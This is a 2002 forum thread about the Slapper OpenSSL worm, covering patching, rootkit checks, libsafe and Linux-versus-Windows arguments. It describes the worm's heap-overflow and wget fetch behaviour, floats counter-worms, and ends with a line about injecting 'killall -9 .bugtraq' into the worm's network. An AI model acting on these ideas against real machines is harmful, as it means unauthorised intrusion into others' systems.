Since chkrootkit normally uses lots of stuff that usually lives in/bin (strings, ps, ls, find, etc), make extra sure that you use the '-p <directory>' flag when you run it. That tells chkrootkit to look for the binaries it needs in directory instead of wherever they are found in your path. Before you can do this, however, you need to (from a fresh, known-to-be-clean install) either copy all the needed binaries to a CD-R or to a partition re-mounted as read-only. A real paranoid would re-compile static versions of those utils and then use those. YMMV.
It does very little good to check for a rootkit when all the good GNU stuff in/bin has been trojaned...
-B
--
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
Thanks, here's another (Re:mirror)
by
phorm
·
· Score: 1
Thank you extremely for putting this up. Seems my server is safe (and now patched), but it's good to know so that I don't have to worry. Also, it saddens me greatly to see that some buttmunch posted the full link, where to be a jerk or just out of sheer ignorance I don't know.
Here's a copy: triple-w.phormix.com/files/public/chkrootkit.tar.g z (replace triple-w. with www.)
"Worms" on the internet? will a "fish" take care of it? - phorm
Every time I hear about anohter buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe? This is a library which, once installed, protects all processes, regardless whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
I once wrote a C program on Linux that accidentally read one byte past the end of an array. It ran fine on Linux.
I uploaded the source to a BSD box, compiled, and ran it and got a segfault (or something like that). It apppears that BSD mapped the program segments so that one byte past the end of my variables was an invalid address.
I still use Linux, not BSD, but I found this experience interesting to say the least. I think VAX/VMS also loaded programs in a similar way.
-- "We can't solve problems by using the same kind of thinking we used when we created them." -- Albert Einstein
Electric Fence in linux (or any other unix platform) will do this for you. It will segfault on any references beyond the end of malloc'ed arrays, use of free()'d memory, etc.
Its very easy to use too -- just link with -lefence or set $LD_PRELOAD to load it.
With it being out for so many years, its a wonder that people don't make it standard practice to use it!
I'd be interested to see what kind of overhead this checking adds to a server. I'll agree that a slow, secure server is better than a fast, unsecure server, but if it is too slow...
Also, I wonder how well this scales up to the enterprise. It may work well for several processes on a single box, but what happens when you distribute those processes to back-end servers. Each box on its own may be fine, but when they intercommunicate, problems could arise.
-- I'd rather you do it wrong, than for me to have to do it at all.
I'm surprised; I checked libsafe's availability under Debian, and although it's in my local package list, it's not downloadable for testing or stable, but it does have an version in unstable. It currently breaks scrollkeeper.
Update to self: Thanks to the new Package Tracking system, I read a better info page on libsafe and re-read a policy problem: libsafe isn't building on Alpha.
Re:libsafe !
by
Anonymous Coward
·
· Score: 0
>"Why doesn't anybody use libsafe [avayalabs.com]? This is a library which, once installed, protects all processes, regardless whether they have been patched or not.
FYI Slapper does not smash the stack, it uses a heap overflow. It corrupts the heap and abuses the glibc implementation of free() to patch the GOT of the Apache process and hijack control. Thus detection methods based on watching only the stack will fail to detect it.
It's certainly a good idea to try and prevent stack overflows, but it won't protect all processes against all attacks.
Regards, Fred
No Compiler? (Re:Same mantra applies...)
by
phorm
·
· Score: 1
And if there were no compiler, then all my./configure, make && make install scripts would go to hell, seeing as though they all recompile themselves. A lot of useful patches often recompile themselves too.
Renaming your compiler binary instead of deleting it would probably be more useful, that way one could at least compile wanted code when needed.
I was infected a week ago. The next day I was warned by F-secure.
I removed the files. Commented out the open_ssl module and restarted Apache.
I had done an upgrade of openSSL in August or so I thought - problem: Redhat backported the patch to the same version number as installed with 7.2. I guess that I applied the wrong rpms.
As for gcc on the server - the server isn't in tha same country as I am. I have never seen it in the flesh. I have a standard Redhat 7.2 on the machine because I need to compile stuff from time to time.
-- realkiwi
Re:autopsy
by
Anonymous Coward
·
· Score: 0
> As for gcc on the server - the server isn't in tha same country as I am. I have never seen it in the flesh. I have a standard Redhat 7.2 on the machine because I need to compile stuff from time to time.
Consider having a script in/root that moves gcc to another filename, with no permissions, and another script that moves it back to gcc with normal access. Use as needed, and keep gcc disabled when not needed.
When I first heard about this "virus", I must admit my sphincter clenched up a bit, being responsible for more than a few Open SSL ecommerce servers (and just having started a week off from work to boot). But after a looking into it for about 10 seconds, I realized I was ok since I upgraded in July.
Am I missing something here or are the people that did get affected by this people who simply ignored the July warning?
Think Pinto
by
Slipped_Disk
·
· Score: 2, Interesting
For those of you who don't recall, the Pinto was a car with a minor flaw - If you bumped into its ass it tended to explode in a fireball. Ford new of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
in the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et. al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago.
The figures being bandied about here are as follows: Code red infected 400000 systems. Slapper infected probably 15000 systems. Considering that Microsoft IIS and Apache/ssl have comparable market share, I'd say the actual, practical, measured difference in vulnerability levels between Microsoft and Apache administrators is substantial.
Re:Slapper: The threat that wasn't?
by
Winterblink
·
· Score: 2
All you've served to point out is that, no matter what platform you choose to run, you should still be diligent in maintaining the security of the system.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion.:) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
no kidding. where have you been??
by
Anonymous Coward
·
· Score: 0
This has been the biggest news in the security community for weeks. You guys are clueless.
And you keep ignoring an equally serious exploit involving trojanned configure scripts. Apparently because you reported on it in July you are willing to let your readers suffer ownership to avoid getting a bunch of lamer posts saying "you already reported this."
I don't know who's doing the counting, but my servers got slammed last week with probes from this damn worm. There are a hell of a lot more than 11,000 machines infected. The traffic I'm seeing from this worm is significantly higher than I saw from Code Red.
Re:Bullshit
by
Anonymous Coward
·
· Score: 0
Interesting results. Perhaps a suboptimal PRNG in Slapper is at play?
My results are quite different. for 3 servers in 3 wildly different subnets, I've gotten exactly 4 Slapper probes. During the same time interval, the same machines recieved 23 codered and nimda probes.
$ cd OpenSSL $ (for obj in $(find . -name *.c); do grep strcpy $obj; done) | wc
37 72 1197 $ (for obj in $(find . -name *.c); do grep strcat $obj; done) | wc
47 57 1125 $ (for obj in $(find . -name *.c); do grep goto $obj; done) | wc
2840 10161 71668 $
Most of the "goto"s are something like "goto end" or "goto bad". However, things like "goto start" look as if they could have been done using for(;;) { } or do { } while(..) or something similar instead.
I wonder why everyone uses null-terminated character arrays and dangerous things like strcat() or strcpy(). Maybe one should rather use a collection of 'trusted' functions that keep track of the current lenght and the maximum lenght of a character array; just for the case one would like to call a product "secure".
Re:OpenSSL source
by
Anonymous Coward
·
· Score: 0
It's NOT a Linux Worm
by
sjvn
·
· Score: 2, Informative
And, it's not an Apache worm either. It's an OpenSSL worm that exploits security holes in OpenSSL 0.9.6f and earlier.
While the current generation of Slapper targets only OpenSSL on Linux, it will try its attack on any system. And, with a little code tweaking, the next generation of Slapper could hammer on any OS that uses older versions of OpenSSL such as AIX, Solaris, Windows. In short, pretty much any OS that uses OpenSSL is potentially a victim.
Could you have it? If you're a Unix/Linux admin, use chkroot version 0.37 and up to find out. It's available at:
http://www.chkrootkit.org/
In any case, anyone who uses OpenSSL should update with OpenSSL 0.9.6g or higher ASAP. And, while you're at, be certain to relink everything since OpenSSL isn't used just by Apache. ISC, for example, used it in their BIND 9.1. Slapper wouldn't hit BIND, but would you care to bet that someone couldn't modify the code to launch a BIND attack--and aren't we all really, really sick of BIND getting bungled?
For more on Slapper, and a listing of patches for many operating systems see:
Slapper: The FUD and the Danger http://www.practical-tech.com/network/n091 82002.ht m
Finally, most of these patches, which would have stopped Slapper dead, were available in late July/early August. Consider it more proof that security is a full time system administrator job.
Steven
I believe the phase you're looking for is:
by
Anonymous Coward
·
· Score: 0
Worst episode ever!
Comic-Book Guy was here...
WRONG!!
by
Anonymous Coward
·
· Score: 0
Believe it or not, a goatsex link was modded Insightful. I shit you not.
Oh, I'm a Karma Whore and I'd Like to Say, ...
by
Anonymous Coward
·
· Score: 0
All togehter now: Defense In Depth.
by
CrystalFalcon
·
· Score: 2
While you're right in part about the importance to secure a system, you miss out completely on the importance on defense in depth.
The worst flaw of them all about any security, not just information security, is depending on any one process or action or filter to take care of all attacks. It Won't Work. It Will Fail and when it does, you're hosed. The more defenses in depth you have deployed, the better off you are.
Let me illustrate some of the key design criteria for a modern-day tank (as in main battle tank) to illustrate:
1) Avoid detection.
2) If detected, avoid getting hit.
3) If hit, avoid penetration.
4) If penetrated, minimize damage to equipment and crew.
See what I mean? You have to consider what happens if your defenses fail, and where you would be the most vulnerable, and take additional steps there. Because, you know what? Your defenses will fail. But the more of them you have, the less damage an attacker will be able to do by bringing one down.
(One software company I used to work for would take this to extremes and code X-Files style; "Always assume that the entire world around you has been compromised, that your code is the last piece of code standing! Every data you get, even from within the system, is from somebody who's feeding you bogus or random data, or even lying on purpose to make you fail." But the resulting software had defense in depth.)
What Causes These Flaws?
by
RAMMS+EIN
·
· Score: 2
Anybody else have the idea that many vulnerabilities are partially due to deficiencies of the programming language used? For example, I believe that C's cumbersome string handling is a major cause of buffer-overrun vulnerabilities. Of course, buffer-overruns and off-by-one errors are programming errors, but I think their frequency at the very least lends legitimacy to programming languages designed to avoid such errors.
As for stack-smashing: I think stack shouldn't be executable anyway. Since Intel has given us data segments that aren't executable and code segments that aren't writable, at least x86 systems could be invulnerable to these attacks. Well, causing a segmentation fault would still lead to DoS I guess, but at least it wouldn't allow arbitrary code to be executed, which would also prevent worms from spreading. And if the segmentation fault would only terminate the thread that is being attacked, rahter than the whole server, it even DoS wouldn't be possible anymore - except through flooding, but that's a different story.
Summing up, I think there is reason to reconsider the lower-level components of our systems. Programming errors could to a large extend be avoided by using a language that doesn't allow them, and implementing a more rigid security system at memory manager level could stop certain exploits from working.
-- Please correct me if I got my facts wrong.
Re:What Causes These Flaws?
by
octogen
·
· Score: 1
That's simply set noexec_user_stack=1 in/etc/system on Solaris/SPARC.
However, Intel processors are not capable of marking a stack segment read/write. The Write/Exec Flags share one bit in the descriptor, so you can't mark stack pages as nonexecutable if you want to have write permission to the same page.
LINUX IS BEING WINDOWZED!!!!
by
Anonymous Coward
·
· Score: 0
It started with kernel version after version fixing memory holes etc etc.
Then It continued with linux movement being teared apart with different version of linux
Now, there area enouggh investement in Linux so it is profitable for virus makers.
Unless the Linux community units and fight all attepmt to make money from linux , building better tools, and not allwing Icazas like attempt to profit...
THe future... a fully Linux bugged like windows.. The trend is very clear, viruses will grow, stop being such maniacs thinking linux is perfect, and start making it better in reality.
Stop the trend!!!!!!!!!!!
Also check your /tmp directory
by
Mr.+Flibble
·
· Score: 2
I have seen variant A and B on my network (I admin about 200 machines, but unfortunately the customers themselves, not I are in charge of patching their systems. I only go in and fix it when the customers realize something is wrong. Sort of a "meta-admin" if you will.)
I have not seen variant C, which I believe uses port 1978. Once the worm hit we blocked all the ports it uses at the router. This mitigated much of the damage, even though the exploit comes in on port 443.
HOWEVER be aware I have seen some attempted backdoor exploits that were not worm based. That is, an apache shell was obtained and someone was in on the system installing extra software and attempting to escalate privliages and crack the root account.
This is far more serious than the worm by itself. Fortunately, all I have seen so far is skript kiddies attempting to install backdoors that don't work because they do not have a rootshell. These backdoors were clearly not part of the regular worm. So other exploits than just the worm itself are out there.
Fortunately this worm is waking my customers up, and the systems are getting patched. (It does not matter how many times I run nessus, and send the customer a report saying "fix this", when I send them a message saying "you have now been hit" they suddenly spring into action, or get me to fix it. Funny how that works.)
Information and live status about the worm
by
randomErr
·
· Score: 2
Hey all,
Ero Carrera at F-Secure.com asked that I post this for them: "Information and live status about the worm can be found at http://www.f-secure.com/slapper/"
Inner Monologue I wonder if Ero is a guy or a chick? And if it's chick is she like looking, ya know what I mean?
-- You say things that offend me and I can deal with it. Can you?
This proves the Brits were behind slapper. And since the PATRIOT Act allows us to define propagating computer worms as an act of terrorism, I vote that the Bush Administration does what we should have done a long time ago:
INVADE BRITAIN!!!!
Re:Excellent...
by
Anonymous Coward
·
· Score: 0
Australia, you're next! lol Do they even have an army? =) Just kidding I'm not even a USian.
why not fight virii with virii?
by
Narcocide
·
· Score: 1
anti-virus as a cure?
this may just be a naive question from a simple web programmer, but why can't someone just write an 'anti-virus?'... a virus that infects computers the same way the Slapper viruses do, but then patches the security breach instead of exploiting it further?
Re:why not fight virii with virii?
by
Garridan
·
· Score: 1
Why not? I think its a great idea. Get crackin', we don't have all day! These worms are spreading like wildfire!
Re:Finally - Linux can be utilized as a Desktop OS
by
Anonymous Coward
·
· Score: 0
Lern tu speek and wryt englsh u bunghole. The word IS VIRII! Viruses sounds like something that an ignorant New York hooker would say. Like "oohh... I slapted my asseses!"
Re:Keep your anti virus software up
by
Anonymous Coward
·
· Score: 0
Half wits at symantec haven't figured out that Linux is a completely different market than the Microsoft open door policy to exploit market.
Why are making this Much more complicated than necessary? I would not even think of downloading a fix for my SuSE system from any outside source. Sign up for the SuSE security mailing list and you will be notified, then disable the service or take appropriate measures until the SuSE security team releases the patch. Download the patch from SuSE and apply it.
its microsoft.
by
Anonymous Coward
·
· Score: 0
microsoft is writing the linux worms.
Re:Slapper: The threat that wasn't?
by
Anonymous Coward
·
· Score: 0
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
Yeah, well, the service that this worm exploits is ON. Which makes your point absolutely moot.
slapper kills two birds with one stone
by
mefus
·
· Score: 1
Well, slapper hasn't really hit the newsstands yet, but some sites are really trying to 1) Scare the hell^Wliberty out of people, and 2) give open source a black eye.
I found this at google:
New Linux virus creates peer-to-peer terror network... The Slapper worm virus writers had unfettered access to the source code of both OpenSSL and Apache, more effectively utilizing their administration features...
Slackware 8.1 has libsafe as one of the packages in/extra directory.
-- ---
d'oh
no mac os9 or 0s8 server EVER exploited
by
Anonymous Coward
·
· Score: 0
no mac os9 or 0s8 server EVER exploited in entire BugTraq database history.
Based on 7 years or more of historical fact, macs are 100% immune running wbservers on the net. There are many technical reasons why macs are the most secure OS.
Correct me if I'm wrong but....
by
Drakonite
·
· Score: 1
Is this a virus based upon a bug in an old version that has been patched and gotten quite a bit of publicity not to long ago?
--
Shoot Pixels, Not People!
Where have you guys been?
by
Anonymous Coward
·
· Score: 0
Where have you folks been? This has been around and in the news for well over a week. Those of us who were vulnerable and cared about security have long since updated OpenSSL and moved on.
"We don't do a new version to fix bugs." - Bill Gates "The new version - it's not there to fix bugs." - Bill Gates
-- Retranslated from Focus 43/1995, pp. 206-212
- this post brought to you by the Automated Last Post Generator...
Slashdot Mirror
... we're starting to catch up with Microsoft in the vital worm-propagation field, where they've been unmatched for years. :-)
Laugh, it's a joke
- sig? who is this sig of which you speak?
1. That most system admins out there are bright enough to keep their machines up to date with the latest patches.
;)
2. Whoever is writing these worms knows how much damage they're doing to open source. It would have been preferrable to inform the OpenSSL people first, wait a month, then release the worm.
Of course, by the time you read this, the bug will have been patched.
Why bother.
You think this is tied to the popularity increas of Linux in the userbase? The webservers have always been around...
;)
Seems like the golves are coming off. Perhaps we need a sample of this worm to test its DNA and determine its origins
"The worms, Slapper.B and Slapper.C, which exploits a known buffer overrun vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process has infected thousands of Web servers worldwide, according to Helsinki-based F-Secure Corp., a computer and network security company. "
Time to grab a coffee.. I thought it said "thanks to Helsinki-based F-Secure Corp." :-)
http://www.chkrootkit.org/
version 0.37 has been updated to find the slapper - JB
The heat from below can burn your eyes out
What do you think are the chances Microsoft employees are contributing buggy patches to key open source projects, causing buffer overruns and worms? It looks like they've found Open Source's achilles heel
So what can we do about it? Maybe we should abandon the GPL (which allows anyone to contribute ticking timebomb patches) and use a better license, such as the Microsoft Shared Source license. That may be the only way to save linux!
I'd say that this looks more like an Apache worm than a Linux worm. It does not seem too bad though, "Get your Apache systems patched and update your antivirus software and you should be fine." (from the Slapper.C article).
This shows that Linux+Apache is so widely accepted that it is a legitimate virus target. Enjoy it!
It does not seem too bad though
You should put this on your resume when you apply at Microsoft...
1) Don't enable services and features you don't need (or in MS sysadmin speak--DISABLE all of the services and features you don't need that have "helpfully" been activated in the base install); and
2) Keep up to date on your patch levels.
You don't have to be bleeding-edge on patches, but when a security vulnerability with malicious code in the wild has been detected, it's time to *DO* something about it!
Really, I wonder how many of these infected websites were actually USING SSL, as opposed to having that port hot but unused...
I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.' and 'Do you know how much you're hurting the open-source movement? Please stop.'
Seems to me like older anti-MS comments are coming around and biting people in the ass.
According to researchers at F-Secure, the Slapper.B worm variant is able to retrieve its source code from a Web page after the worm has been removed from infected servers. The worm uses a common free software utility, wget, to retrieve its source code from an infected Web page in the home.ro domain.
Administrators of the domain, which is located in Romania, have been notified and the infected page has been deleted from the site, according to F-Secure.
They should have replaced the code for the worm with code that pops up a window that says "Patch your server, you halfwit!"
Maybe the state's highest function is to grind out insoluble problems. (Zelazny, Hall of Mirrors)
"Of course, by the time you read this, the bug will have been patched. ;)"
This is the most significant benefit (to me atleast). In fact, I think that to most people, the biggest of open source is the rapid deployment of bug fixes, patches etc. rather than cheap or free software. Without open source, I'm afraid most of us would be stuck in a world of buggy software that only works when it feels like it.
Oh Wait a minute... What? "Windows has encounterd a problem..."
Anyway, the point is that I have never heard of MS, Oracle, or any of the other major software companies ever having a patch within hours much less days for anything.
http://www.cert.org/advisories/CA-2002-27.html
A bank robbery is a different type of intrusion. You cannot threaten a computer to give you access. An armed bank robbery is a failure of humans, not security systems. I'm sure all the cameras and locking mechanisms on doors and vaults at a bank work just fine in an armed robbery. The humans unlock them out of self-preservation and the mechanisms do exactly what they are requested.
Exploiting a vulnerability like this is similar to walking down the ally behind the bank and finding an unlocked door that takes you straight into the vault. Some people (other politics aside such as "who would want to help such a stupid bank!?") would inform the bank, hoping to increase it's security. Typically in open source, when we find unlocked doors, we tell the maintainers as soon as possible. It's peer review.
I am not suggesting we do not release exploits though. Worms like this are a good practice run (and a great way of informing the sysadmins they need updates). *shrug*
Why bother.
What should I look for in my apache logs to see if Im being "hit" by it? Anyone have an example?
your friendly neighborhood AC
I guess not even open source solutions can cure lazy admin syndrome, eh?
When was it stated that it would?
So, did the bite hurt, ass?
IMHO if you need SSL on a webserver, you should be forced to go through the download + build + cert process yourself.
If you were like me and wondered if after the OpenSSL upgrade that you actually patched everything right, you can compile and run this program to find out:
- ss lv2-master/openssl-sslv2-master.c
http://cert.uni-stuttgart.de/advisories/openssl
It will connect to your HTTPS server and check it. Unfortunatly, it won't connect to SSH. It helped me make sure I was patched up at least for apache.
And I have never quite understood why the advisory says to recompile your apps as well. If they are using the Shared Library, where the problem actually exists, then they get the upgrade by default. Now, if you had some static compiles, then sure.
Pbur
Linux can be utilized as a Desktop OS!
:(
I can do everything virtually in Linux what I can do in Windows.
Theres only little in the field of capturing/encoding divx movies and graphical download managers, but I might be wrong there since I havent bothered to look.
I also have to give a lecture on the slapper worm in a couple weeks and I havent really started my presentation notes
Wish me LUCK!
I find it somewhat odd that each advisory from an anti-virus vendor concerning the slapper worm advises to not only patch your software, but also keep your antivirus software current.
If the software is patched then antivirus software is irrelevent.
How big is the antivirus software market for linux?
Usualy it takes at least half of hour to release patch when hole is discovered.
This time patch was month or so too fast for Slapper.B and C. Does this mean that Open Source gets better and better?
p.s. I hate lame unintuitive virus writers without imagination
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I've been having trouble connecting to http://www.apache.org this morning. Maybe that's why ?
Oh wait, it's on a +5 /. post..
Code Red infected at least 400,000 Microsoft systems. I think it infected 40,000 in the first day. Nimda got something like 65,000 plus. Slapper has infected 7,000 to 11,000, depending upon who you listen to. Now take into consideration that Linux Apache systems host a significantly larger number of web sites than Windows systems do.
Slapper is a minor event. I see a constant stream of Microsoft security alerts go through my mailbox, and you don't hear a peep out of these Microsoft apologists and cheerleaders until a serious Open Source vulnerability occurs once or twice a year.
All complex software will have bugs. It seems to me that Open Source bugs get fixed quicker, and Open Source admins are more inclined to patch in a timely manner than Microsoft ones by at least one order of magnitude. What do you expect from Windows, though, when its target market is people who don't know how to use computers.
> I find it terribly amusing how for years the open-source community has used the larger number of holes found in Windows systems as one of their arguments against it. Yet now when the open-source community is also plagued with the same thing the comments tend to be along the line of 'Windows still sux.'...
Sheesh, evil *and* a jerk. -- Jade
being a good samaritan. no www prefix so browsers won't auto link it, no http prefix for same reason. please do not convert to hyperlink. digitalsushi.com/chkrootkit.tar.gz will leave up for 24 hours, or when i just cant take the abuse anymore.
slashdot: where everyone yells sarcastic metaphors to themselves to understand the issue
To all those who will no doubt post "see, CodeRed can happen to Linux, too" - here is some enlightenment:
There are currently an estimated 10,000 hosts infected with Slapper (any variant).
According to DShield's CodeRed history page, around 25,000 windos hosts are still estimated as CodeRed infected, one year after the event.
According to news.com, at the peak we had over 350,000 infected machines.
10,000 is about 2% of 350,000. No, Slapper is in not even comparable to CodeRed when it comes to spread, neither speed nor coverage.
It does, however, proof two things:
a) The Linux world is susceptible to the same generic diseases
b) For various reasons (more variety, better sysadmins, better security in general), it coped much better with an actual outbreak.
Assorted stuff I do sometimes: Lemuria.org
Yammer yammer yammer!
No wait! "Developers! Developers! Developers! Developers!" -- Steve "Monkey Boy" Balmer
Why the F___ is this being called a LINUX worm, when in fact it is an SSL worm?
Lets just hope Taco isn't doing too much sys admin work these days because this is really old news. Slapper was spotted over a week ago and the news appeared on LWN at the URL below.
http://www.lwn.net/Articles/10026/
Thanks.
rooooar
No kidding! I was so glad to see that we get virii and worms, too. I mean, seriously. I was getting so tired of hearing my co-workers say "Hey, I've got the latest variation of the KleZ virus." "Oh yeah? Code red is still eating me alive!" As I just meekly stir my Dr. Pepper and saunter off...
Not anymore! I TOO am infected! HAHAHA!!! We can at last fully compete with the desktop market!
Oh wait... I guess it's a webserver virus, huh? Crap. Better luck next time, I guess.
Just read this:
7 -24testimony.asp
http://www.microsoft.com/presspass/exec/charney/0
-SexyKellyOsbourne
Got to love the buffer overflow... i will just laugh quitely while you patch your machines as you have done to me many times with iis...
Rather than simply having deleted the page, I wonder if it would have possible to replace this source code with something else that acted as an "antibody"?
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vunerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
Vos teneo officium eram periculosus ut vos recipero is.
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because running Linux, they can't be infected with any viruses and worms. The result of this is that many of hese adminstarators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux adminstrators are more tech savy than Windows adminstrators but as linx GUI improves, one will see a prliferation of not so tech savy adminstrators in the Linux market as well.So be prepared for increasing amounts of damage which such worms can cause.
On the other hand, the adminstrators of Windows machines, because they are facing a new worm every second day, try to stay uptodate with the latest news and patches. Most of them have aautomatic update wizards running on their machines which download new patches instantly.
Infact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system adminstrator is too lazy to check a news site, he will still come to know abot the threat.
And because it will be running on linux, it will do what its supposed to do, not "God knows What and Gates knows what" as is the case with windows update wizard.
What's under yellowstone?
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
May we never see th
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed based on user account deletion
If open source has tons of programmers around the world reviewing every piece of code, how is there a security vulnerability? Could it be that open and proprietary software SHARE some of the same problems? Nah. Couldn't be.
/sarcasm
Comment removed based on user account deletion
IRIX has this nasty tendency to have lots of unimportant stuff running... /Mikael
Greylisting is to SMTP as NAT is to IPv4
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reitterate their dogmatic belief: Virus := Bad
OpenSource := Good
Microsoft := Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
When OpenSSL design flaw opened a path for exploits it was classified as "Linux".
What gives?
And the patch fixes the hole that all variants use.
May we never see th
Comment removed based on user account deletion
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
May we never see th
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse then having to reformat and reinstall the entire os because your are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are carefull about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
>I find it somewhat odd that each advisory from an anti-virus vendor
>concerning the slapper worm advises to not only patch your software,
>but also keep your antivirus software current.
>If the software is patched then antivirus software is irrelevent.
>How big is the antivirus software market for linux?
>
>
There isn't one and there still won't be one after this, because you don't need antivirus software to either detect or fix the problem. That's the big problem the anti-virus outfits are running into. The open source movement still doesn't need them.
Upgrading OpenSSL isn't the only necessary step. I patched mine, and forgot to restart Apache -- and got hit by the "A" variant last week. Picked it up immediately, and removed it. Its pretty harmless as these things go, but it dawned on me when I cleaned it up and did a tripwire check to make sure nothing had changed that I hadn't restarted Apache when I upgraded the libraries.
> virii
The word is VIRUSES !!!!
Not to troll, but doesn't anybody see a big big problem?
Okay, so somebody out there is coding Worms especially for Linux. No problem, that was to be expected.
But the problem is this, the patch could be made by anyone, right? So this patch could also be infected or make thinks worse...
I myself NEVER check code on Linux, just because I can't code and don't want to... So I would download the patch and install it, but how can I be sure the patch isn't another Worm or Trojan?
I could wait for an "official" release by Suse, but hey... I want to patch this [fill new worm name her] worms threat as soon as possible, mainly BECAUSE I don't have a clue how it works...
Please don't reply with "Get A Clue" because that's for me (and I guess for a lot of people) no option...
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get
on the ball and fully patch-up;
September 23 VNUNET.COM.
A suspect has been arrested on suspicion of authoring the Slapper worm.
But although the threat of the worm seems to have been short-lived, a new
variant is already set to take up where its predecessor left off. Although
the ISC's 'most attacked ports' chart no longer features Slapper in its
Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has
several subtle differences, but is for the most part an updated version of
its predecessor. Both worms attempt to exploit a known vulnerability in
the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants
also carry the same payload, a password-protected backdoor and denial of
service (DoS) capabilities. ISS's Morgan said that with the new variant on
the loose his company had calculated that about 10,000 servers were
probably now infected, and that the network was probably going to be used
for DoS attacks. He added that it was unlikely the original author created
the second worm. "It was significant that source code for the original
Slapper was distributed within the computer underground immediately after
the worm was detected in the wild," he said. Source:
http://www.vnunet.com/News/1135274
--
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
It's called "installed user base".
A linguistic note for Americans and other aliens....
"Slapper" is an EnglishEnglish term for a woman with an easily exploited hole....
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearence I had more then 340000 Nimda "visits" on the network I surpervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Let me explain the process. You tell me if the analogy fits.
robber:
OpenSSL:
robber:
OpenSSL:
robber:
OpenSSL:
robber:
--- Nothing clever here: move along now...
Why are there still such kind of errors!? Aren't there safer ways to work with buffers? Can't we people just enable runtime checks for these things?!
sheesh!
Looking for people to chat about multicopters, coding, music. skype: gtsiros
Does anyone have the source to it?
:) noticed that one could inject 'killall -9 .bugtraq' into the infection network, to shut it down.
